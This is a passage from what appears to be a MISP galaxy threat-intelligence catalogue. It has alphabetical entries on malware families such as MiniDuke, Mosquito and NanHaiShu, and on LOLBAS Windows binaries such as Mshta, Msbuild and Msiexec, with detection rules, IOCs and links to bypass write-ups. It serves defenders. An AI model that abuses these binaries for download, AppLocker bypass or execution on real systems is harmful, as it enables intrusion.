MiniDuke is malware that was used by APT29 from 2010 to 2015. The MiniDuke toolset consists of multiple downloader and backdoor components. The loader has been used with other MiniDuke components as well as in conjunction with CosmicDuke and PinchDuke. [F-Secure The Dukes]
Internal MISP references
UUID 2bb16809-6bc3-46c3-b28a-39cb49410340 which can be used as unique global reference for MiniDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0051 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
MirageFox
MirageFox is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. [APT15 Intezer June 2018]
Internal MISP references
UUID 535f1b97-7a70-4d18-be4e-3a9f74ccf78a which can be used as unique global reference for MirageFox in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0280 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Misdat
Misdat is a backdoor that was used in Operation Dust Storm from 2010 to 2011.[Cylance Dust Storm]
Internal MISP references
UUID 4048afa2-79c8-4d38-8219-2207adddd884 which can be used as unique global reference for Misdat in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0083 |
| source | MITRE |
| type | ['malware'] |
Mis-Type
Mis-Type is a backdoor hybrid that was used in Operation Dust Storm by 2012.[Cylance Dust Storm]
Internal MISP references
UUID fe554d2e-f974-41d6-8e7a-701bd758355d which can be used as unique global reference for Mis-Type in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0084 |
| source | MITRE |
| type | ['malware'] |
Mivast
Mivast is a backdoor that has been used by Deep Panda. It was reportedly used in the Anthem breach. [Symantec Black Vine]
Internal MISP references
UUID f603ea32-91c3-4b62-a60f-57670433b080 which can be used as unique global reference for Mivast in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0080 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mmc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Load snap-ins to locally and remotely manage Windows systems
Author: @bohops
Paths: * C:\Windows\System32\mmc.exe * C:\Windows\SysWOW64\mmc.exe
Resources: * https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ * https://offsec.almond.consulting/UAC-bypass-dotnet.html
Detection: * Sigma: proc_creation_win_mmc_susp_child_process.yml * Sigma: file_event_win_uac_bypass_dotnet_profiler.yml[Mmc.exe - LOLBAS Project]
Internal MISP references
UUID 8c7acae2-f844-4e01-86d8-18c3ea90963f which can be used as unique global reference for Mmc in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5126 |
| source | Tidal Cyber |
| tags | ['f9e6382f-e41e-438e-bd7e-57a57046d9e6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
MobileOrder
MobileOrder is a Trojan intended to compromise Android mobile devices. It has been used by Scarlet Mimic. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 116f913c-0d5e-43d1-ba0d-3a12127af8f6 which can be used as unique global reference for MobileOrder in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0079 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
MoleNet
MoleNet is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.[Cybereason Molerats Dec 2020]
Internal MISP references
UUID 7ca5debb-f813-4e06-98f8-d1186552e5d2 which can be used as unique global reference for MoleNet in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0553 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mongall
Mongall is a backdoor that has been used since at least 2013, including by Aoqin Dragon.[SentinelOne Aoqin Dragon June 2022]
Internal MISP references
UUID 7f5355b3-e819-4c82-a0fa-b80fda8fd6e6 which can be used as unique global reference for Mongall in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1026 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
MoonWind
MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. [Palo Alto MoonWind March 2017]
Internal MISP references
UUID a699f32f-6596-4060-8fcd-42587a844b80 which can be used as unique global reference for MoonWind in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0149 |
| source | MITRE |
| type | ['malware'] |
More_eggs
More_eggs is a JScript backdoor used by Cobalt Group and FIN6. Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. [Talos Cobalt Group July 2018][Security Intelligence More Eggs Aug 2019]
Internal MISP references
UUID 69f202e7-4bc9-4f4f-943f-330c053ae977 which can be used as unique global reference for More_eggs in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0284 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mori
Mori is a backdoor that has been used by MuddyWater since at least January 2022.[DHS CISA AA22-055A MuddyWater February 2022][CYBERCOM Iranian Intel Cyber January 2022]
Internal MISP references
UUID 385e1eaf-9ba8-4381-981a-3c7af718a77d which can be used as unique global reference for Mori in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1047 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mosquito
Mosquito is a Win32 backdoor that has been used by Turla. Mosquito is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. [ESET Turla Mosquito Jan 2018]
Internal MISP references
UUID c3939dad-d728-4ddb-804e-cf1e3743a55d which can be used as unique global reference for Mosquito in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0256 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
MpCmdRun
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
Author: Oddvar Moe
Paths: * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
Resources: * https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus * https://twitter.com/mohammadaskar2/status/1301263551638761477 * https://twitter.com/Oddvarmoe/status/1301444858910052352 * https://twitter.com/NotMedic/status/1301506813242867720
Detection: * Sigma: win_susp_mpcmdrun_download.yml * Elastic: command_and_control_remote_file_copy_mpcmdrun.toml * IOC: MpCmdRun storing data into alternate data streams. * IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. * IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log * IOC: User Agent is "MpCommunication"[MpCmdRun.exe - LOLBAS Project]
Internal MISP references
UUID ec54a1e4-92d4-4503-a510-a18989f1f8f3 which can be used as unique global reference for MpCmdRun in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5127 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Msbuild
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to compile and execute code
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe * C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe * C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
Resources: * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md * https://github.com/Cn33liz/MSBuildShell * https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191 * https://github.com/LOLBAS-Project/LOLBAS/issues/165 * https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files * https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events
Detection: * Sigma: file_event_win_shell_write_susp_directory.yml * Sigma: proc_creation_win_msbuild_susp_parent_process.yml * Sigma: net_connection_win_silenttrinity_stager_msbuild_activity.yml * Splunk: suspicious_msbuild_spawn.yml * Splunk: suspicious_msbuild_rename.yml * Splunk: msbuild_suspicious_spawned_by_script_process.yml * Elastic: defense_evasion_msbuild_beacon_sequence.toml * Elastic: defense_evasion_msbuild_making_network_connections.toml * Elastic: defense_evasion_execution_msbuild_started_by_script.toml * Elastic: defense_evasion_execution_msbuild_started_by_office_app.toml * Elastic: defense_evasion_execution_msbuild_started_renamed.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Msbuild.exe should not normally be executed on workstations[LOLBAS Msbuild]
Internal MISP references
UUID 1f500e4c-25a1-4570-a3ba-5c9cd463afde which can be used as unique global reference for Msbuild in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5128 |
| source | Tidal Cyber |
| tags | ['dfda978e-e0a0-4e1a-85c7-d9ab2cd7ccc5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Msconfig
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
Author: Oddvar Moe
Paths: * C:\Windows\System32\msconfig.exe
Resources: * https://twitter.com/pabraeken/status/991314564896690177
Detection: * Sigma: proc_creation_win_uac_bypass_msconfig_gui.yml * Sigma: file_event_win_uac_bypass_msconfig_gui.yml * IOC: mscfgtlc.xml changes in system32 folder[Msconfig.exe - LOLBAS Project]
Internal MISP references
UUID 90c6cc43-d9dd-436c-b7ee-ede979765bdf which can be used as unique global reference for Msconfig in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5129 |
| source | Tidal Cyber |
| tags | ['7e20fe4e-6883-457d-81f9-b4010e739f89', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Msdeploy
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft tool used to deploy Web Applications.
Author: Oddvar Moe
Paths: * C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
Resources: * https://twitter.com/pabraeken/status/995837734379032576 * https://twitter.com/pabraeken/status/999090532839313408
Detection: * Sigma: proc_creation_win_lolbin_msdeploy.yml[Msdeploy.exe - LOLBAS Project]
Internal MISP references
UUID 175b32ed-bea6-491c-8aac-d088f642a6e1 which can be used as unique global reference for Msdeploy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5226 |
| source | Tidal Cyber |
| tags | ['11452158-b8d2-4a33-952a-8896f961a2f5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Msdt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft diagnostics tool
Author: Oddvar Moe
Paths: * C:\Windows\System32\Msdt.exe * C:\Windows\SysWOW64\Msdt.exe
Resources: * https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ * https://twitter.com/harr0ey/status/991338229952598016 * https://twitter.com/nas_bench/status/1531944240271568896
Detection: * Sigma: proc_creation_win_lolbin_msdt_answer_file.yml * Sigma: proc_creation_win_msdt_arbitrary_command_execution.yml * Elastic: defense_evasion_network_connection_from_windows_binary.toml[Msdt.exe - LOLBAS Project]
Internal MISP references
UUID bc39280c-da92-4e78-ab37-7c54ff72a1ba which can be used as unique global reference for Msdt in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5130 |
| source | Tidal Cyber |
| tags | ['8c30b46b-3651-4ccd-9d91-34fe89bc6843', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Msedge
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Edge browser
Author: mr.d0x
Paths: * c:\Program Files\Microsoft\Edge\Application\msedge.exe * c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Resources: * https://twitter.com/mrd0x/status/1478116126005641220 * https://twitter.com/mrd0x/status/1478234484881436672
Detection: * Sigma: proc_creation_win_browsers_msedge_arbitrary_download.yml * Sigma: proc_creation_win_browsers_chromium_headless_file_download.yml[Msedge.exe - LOLBAS Project]
Internal MISP references
UUID d64d75ba-1722-4a39-ab7f-d46c5d5815ec which can be used as unique global reference for Msedge in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5131 |
| source | Tidal Cyber |
| tags | ['5bd3af6b-cb96-4d96-9576-26521dd76513', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
msedge_proxy
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Edge Browser
Author: Mert Daş
Paths: * C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Resources: None Provided
Detection: None Provided[msedge_proxy.exe - LOLBAS Project]
Internal MISP references
UUID e098413e-1d54-4d1f-bf63-1443b57bcc2f which can be used as unique global reference for msedge_proxy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5182 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
msedgewebview2
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.
Author: Matan Bahar
Paths: * C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Resources: * https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf
Detection: * IOC: msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path[msedgewebview2.exe - LOLBAS Project]
Internal MISP references
UUID ac6d4ab8-f34c-4b00-a943-cc2749b28a05 which can be used as unique global reference for msedgewebview2 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5183 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Mshta
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute html applications. (.hta)
Author: Oddvar Moe
Paths: * C:\Windows\System32\mshta.exe * C:\Windows\SysWOW64\mshta.exe
Resources: * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Detection: * Sigma: proc_creation_win_mshta_susp_pattern.yml * Sigma: proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml * Sigma: proc_creation_win_mshta_lethalhta_technique.yml * Sigma: proc_creation_win_mshta_javascript.yml * Sigma: file_event_win_net_cli_artefact.yml * Sigma: image_load_susp_script_dotnet_clr_dll_load.yml * Elastic: defense_evasion_mshta_beacon.toml * Elastic: lateral_movement_dcom_hta.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: suspicious_mshta_activity.yml * Splunk: detect_mshta_renamed.yml * Splunk: suspicious_mshta_spawn.yml * Splunk: suspicious_mshta_child_process.yml * Splunk: detect_mshta_url_in_command_line.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: mshta.exe executing raw or obfuscated script within the command-line * IOC: General usage of HTA file * IOC: msthta.exe network connection to Internet/WWW resource * IOC: DotNet CLR libraries loaded into mshta.exe * IOC: DotNet CLR Usage Log - mshta.exe.log[LOLBAS Mshta]
Internal MISP references
UUID f552a5a4-49dd-4ba6-9916-e631df4d4457 which can be used as unique global reference for Mshta in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5132 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'fe0e2dd3-962e-41a3-9850-cea146b1301f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Mshtml
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft HTML Viewer
Author: LOLBAS Team
Paths: * c:\windows\system32\mshtml.dll * c:\windows\syswow64\mshtml.dll
Resources: * https://twitter.com/pabraeken/status/998567549670477824 * https://windows10dll.nirsoft.net/mshtml_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Mshtml.dll - LOLBAS Project]
Internal MISP references
UUID f94674b9-f924-4452-8516-49657ed40032 which can be used as unique global reference for Mshtml in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5192 |
| source | Tidal Cyber |
| tags | ['46338353-52ee-4f8d-9f18-f1b32644dd76', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Msiexec
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute msi files
Author: Oddvar Moe
Paths: * C:\Windows\System32\msiexec.exe * C:\Windows\SysWOW64\msiexec.exe
Resources: * https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ * https://twitter.com/PhilipTsukerman/status/992021361106268161 * https://badoption.eu/blog/2023/10/03/MSIFortune.html
Detection: * Sigma: proc_creation_win_msiexec_web_install.yml * Sigma: proc_creation_win_msiexec_masquerading.yml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * Splunk: uninstall_app_using_msiexec.yml * IOC: msiexec.exe retrieving files from Internet[LOLBAS Msiexec]
Internal MISP references
UUID 9d00d3c4-9a01-403a-9275-c94960fd871f which can be used as unique global reference for Msiexec in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5133 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fc2bbc6f-da5c-4afd-ae27-2fadf77c3bc4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
MsoHtmEd
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office component
Author: Nir Chako
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_msohtmed_download.yml * IOC: Suspicious Office application internet/network traffic[MsoHtmEd.exe - LOLBAS Project]
Internal MISP references
UUID d316ab94-0420-4356-a3bb-f92f42a4247c which can be used as unique global reference for MsoHtmEd in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5227 |
| source | Tidal Cyber |
| tags | ['874c053b-d6b8-42c2-accc-cd256bb4d350', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Mspub
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Publisher
Author: Nir Chako
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe * C:\Program Files\Microsoft Office\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe * C:\Program Files\Microsoft Office\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe * C:\Program Files\Microsoft Office\Office14\MSPUB.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_mspub_download.yml * IOC: Suspicious Office application internet/network traffic[Mspub.exe - LOLBAS Project]
Internal MISP references
UUID c07f48ee-4667-4dd3-aa8e-cb6d588c547c which can be used as unique global reference for Mspub in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5228 |
| source | Tidal Cyber |
| tags | ['a523dcb0-9181-4170-a113-126df84594ca', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
msxsl
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Command line utility used to perform XSL transformations.
Author: Oddvar Moe
Paths: * no default
Resources: * https://twitter.com/subTee/status/877616321747271680 * https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker * https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file
Detection: * Sigma: proc_creation_win_wmic_xsl_script_processing.yml * Elastic: defense_evasion_msxsl_beacon.toml * Elastic: defense_evasion_msxsl_network.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml[msxsl.exe - LOLBAS Project]
Internal MISP references
UUID 8cccbfed-3f78-45fd-b5d1-efe884d28f09 which can be used as unique global reference for msxsl in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5229 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
MURKYTOP
MURKYTOP is a reconnaissance tool used by Leviathan. [FireEye Periscope March 2018]
Internal MISP references
UUID 768111f9-0948-474b-82a6-cd5455079513 which can be used as unique global reference for MURKYTOP in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0233 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mythic
Mythic is an open source, cross-platform post-exploitation/command and control platform. Mythic is designed to "plug-n-play" with various agents and communication channels.[Mythic Github][Mythic SpecterOps][Mythc Documentation] Deployed Mythic C2 servers have been observed as part of potentially malicious infrastructure.[RecordedFuture 2021 Ad Infra]
Internal MISP references
UUID f1398367-a0af-4a89-b240-50cae4985ed9 which can be used as unique global reference for Mythic in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0699 |
| source | MITRE |
| tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
| type | ['tool'] |
Naid
Naid is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Naid June 2012]
Internal MISP references
UUID 5cfd6135-c53b-4234-a17e-759494b2101f which can be used as unique global reference for Naid in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0205 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
NanHaiShu
NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute. [Proofpoint Leviathan Oct 2017] [fsecure NanHaiShu July 2016]
Internal MISP references
UUID 0e28dfc9-8948-4c08-b7d8-9e80e19cc464 which can be used as unique global reference for NanHaiShu in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0228 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
NanoCore
